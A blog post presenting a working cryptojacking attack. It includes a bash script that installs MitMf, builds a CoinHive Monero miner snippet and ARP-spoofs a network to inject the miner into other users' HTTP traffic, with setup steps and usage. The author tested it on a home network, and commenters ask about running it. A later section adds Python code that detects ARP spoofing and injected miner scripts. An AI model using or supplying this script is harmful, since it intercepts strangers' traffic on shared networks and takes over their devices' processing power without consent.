General, Info Sec 10-October-2017 .NetRussell 5 comments

Miner In the Middle


So not too long ago I read an article that TPB was running a JS miner in visitors’ browsers when they visit, to generate some extra cash. I thought it was a pretty novel idea. Why not, I’d rather give up a little CPU power instead of looking at obnoxious ads.

Then I got to thinking… I wonder how hard it would be to inject a javascript miner into a public network.

A few weeks back I started playing around with MitMf (Man In the Middle Framework). Originally my goal was to inject BeEF hooks and eventually get a shell. I realized though that this was a futile attempt these days, so I moved on. Then I saw this JavaScript payload that mines Monero for you and I got to thinking. It would be pretty easy to drop onto a public network, arpspoof everyone and inject a JavaScript miner into their browser. So I started working on the attack. I’m happy to say that I was able to prove this and here is a PoC 😀

tldr; here’s the script


Setting up The Attack:

Before you can launch your mining assault you need to first

  1. Get a monero wallet
  2. Get a CoinHive account 

Once you have your CoinHive account, navigate to settings and put your monero wallet payout address into the site. That way they can pay you your funds 😀

You’ll also need to get an API key from the site. This is also under the settings page.

You’re also going to need to install MitMf and Twisted 15.5.0 if you’re running Kali. You can either install these by hand or you can run the script I built.

To install manually:

apt-get update;

apt-get install mitmf

pip install Twisted==15.5.0

How the Attack Works:

The attack is pretty simple actually. Your attacking machine needs to connect to a network with people surfing the web on it. Once connected, you run the script I provided above. The script will create an HTML file that has the JavaScript Monero miner in it and it will also link your API key into it. Once the file is built, it launches the MitMf application.

The MitMf application, once running, will first ARP-poison the network and tell everyone to route traffic through your machine. Next it will listen for HTTP responses. When it sees one, it will inject our payload into it. Finally the victim will execute the payload automatically, without prompt, and start mining Monero for you.

That’s it!

I attempted this attack on my home network and within about 30 seconds I had 3 machines and my girlfriend’s phone mining Monero for me lol

For the skeptics that are afraid to download the script, here’s the code. It’s pretty straightforward.


if [ $# -eq “3” ]     then

apt-get update -y

apt-get install mitmf -y

pip install Twisted==15.5.0

echo “<script src=””></script><script>var miner = new      CoinHive.Anonymous(‘”$1″‘);miner.start();</script>” > /root/.miner_itm.html

mitmf –inject –html-file /root/.miner_itm.html –spoof –arp –gateway $2 -i $3


echo “./ <coinhive api key> <gateway ip> <interface name>”




Now obviously it is ILLEGAL to mine on someone’s machine without their express permission. Also, remember that mining reduces the shelf life of your hardware. Devices weren’t designed to run at 100% for days, weeks or months at a time. I just wanted to demo this fun little attack that I think we’ll see more of in the future.

If you have any questions or info on how to clean this up, please reach out to me on twitter
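For anyone checking their own network, both steps described above leave a trace: the ARP poisoning makes the gateway's IP resolve to the same MAC address as another host, and the injected payload shows up as an inline script calling `CoinHive.Anonymous` in plain-HTTP pages. The sketch below is an added example, not code from the original post; it checks a Linux `/proc/net/arp` table and an HTML body for those two indicators, and the sample table, sample page and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in Linux /proc/net/arp format (addresses are made up).
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         08:00:27:aa:bb:cc     *        wlan0
192.168.1.23     0x1         0x2         08:00:27:aa:bb:cc     *        wlan0
192.168.1.40     0x1         0x2         3c:5a:b4:11:22:33     *        wlan0
"""

# Constructed HTTP response body carrying the kind of tag the post describes.
SAMPLE_HTML = ("<html><body><p>news</p><script>var miner = new "
               "CoinHive.Anonymous('EXAMPLE_KEY');miner.start();</script></body></html>")

MINER_RE = re.compile(r"CoinHive\.Anonymous\s*\(", re.I)


def shared_macs(arp_text):
    """Map each MAC that answers for more than one IP to those IPs."""
    by_mac = defaultdict(set)
    for line in arp_text.splitlines()[1:]:          # skip the header row
        cols = line.split()
        if len(cols) < 6:
            continue
        ip, flags, mac = cols[0], cols[2], cols[3].lower()
        if flags == "0x0" or mac == "00:00:00:00:00:00":   # incomplete entry
            continue
        by_mac[mac].add(ip)
    return {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1}


def gateway_spoofed(arp_text, gateway_ip):
    """True when the gateway's MAC is also claimed by another host."""
    return any(gateway_ip in ips for ips in shared_macs(arp_text).values())


def injected_miner_scripts(html):
    """Return inline <script> bodies that instantiate the CoinHive miner."""
    scripts = re.findall(r"<script\b[^>]*>(.*?)</script>", html, re.S | re.I)
    return [s.strip() for s in scripts if MINER_RE.search(s)]


if __name__ == "__main__":
    print(shared_macs(SAMPLE_ARP))
    print(gateway_spoofed(SAMPLE_ARP, "192.168.1.1"))
    print(injected_miner_scripts(SAMPLE_HTML))
```

A shared MAC can also be legitimate (proxy ARP, a router holding several addresses), so treat a hit as a prompt to compare the gateway MAC against one recorded on a known-good occasion.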


5 thoughts on “Miner In the Middle”

  1. I want to try this out on my home network but don’t want to hose my home machines. Is it easy to cleanup/stop once it gets going?

    1. Yes, once the victim is infected, all you have to do is close the browser. The payloads should get cleaned up naturally.

  2. Wow, very interesting stuff 🙂
    I have 2 questions: how can one detect if his machine is infected and how can an attacker see the number of infected machines working for him?
